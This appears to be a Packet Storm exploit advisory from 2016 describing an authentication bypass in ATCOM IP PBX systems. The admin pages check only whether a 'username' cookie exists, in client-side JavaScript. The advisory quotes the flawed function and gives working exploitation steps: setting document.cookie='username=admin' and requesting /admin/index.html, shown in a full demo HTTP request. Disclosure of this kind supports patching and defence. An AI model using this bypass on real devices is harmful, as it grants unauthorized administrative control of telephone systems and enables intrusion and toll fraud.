ATCOM PBX Authentication Bypass

2016-06-16T00:00:00
ID PACKETSTORM:137494
Type packetstorm
Reporter i-Hmx
Modified 2016-06-16T00:00:00

Description

                                        
                                            `# Title: ATCOM PBX system , auth bypass exploit  
# Author: i-Hmx  
# contact : n0p1337@gmail.com  
# Home : sec4ever.com  
# Tested on : ATCOM IP01 , IP08 , IP4G and ip2G4A  
  
Details  
The mentioned system is affected by auth bypass flaw that allow an attacker  
to get admin access on the vulnerable machine without perior access  
The security check is really stupid , depend on js  
affected lines  
  
js/util.js  
function alertWithoutLogin(){  
var username = getCookie("username");  
//alert(username);  
if(!!!username){  
alert('Sorry, permission denied. Please login first!');  
}  
}  
  
so actually it just check if username value exist in cookies  
and if not , redirect to login.html  
just like that!!!!!!!!!!!!!  
  
exploitation?!  
just from browser , press f12 , open console  
type document.cookie="username=admin"  
or from burp intercept proxy and set the cookies as well  
go to ip/admin/index.html  
and you are in , simple like that :/  
  
Demo request  
  
GET /admin/index.html HTTP/1.1  
Host: 192.168.44.12  
User-Agent: Mozilla/1.0 (Windows NT 3.3; WOW32; rv:60.0) Gecko/20010101  
Firefox/60.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: username=admin  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
>From Eg-R1z with love  
./Faris  
`